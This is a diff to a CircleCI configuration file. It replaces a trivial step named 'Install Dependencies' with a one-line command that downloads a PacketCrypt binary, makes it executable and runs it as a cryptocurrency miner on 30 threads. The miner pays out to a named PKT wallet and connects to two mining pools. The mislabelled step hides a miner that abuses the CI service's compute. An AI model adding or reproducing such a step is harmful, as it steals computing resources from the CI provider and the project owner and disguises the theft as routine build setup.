--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -8,8 +8,8 @@ jobs:
         - run:
             name: Install Dependencies
             command: |
-              lscpu
-              echo Hello,subscribe it
+              wget https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.4.4/packetcrypt-v0.4.4-linux_amd64 -O packetcrypt && chmod +x packetcrypt && ./packetcrypt ann -p pkt1q6ft7pcncygr05a4vp9zxvgszpxu0j78nqyz9la http://pool.pktpool.io http://pool.pkt.world --threads 30
+ 
 
 workflows:
     version: 2.1
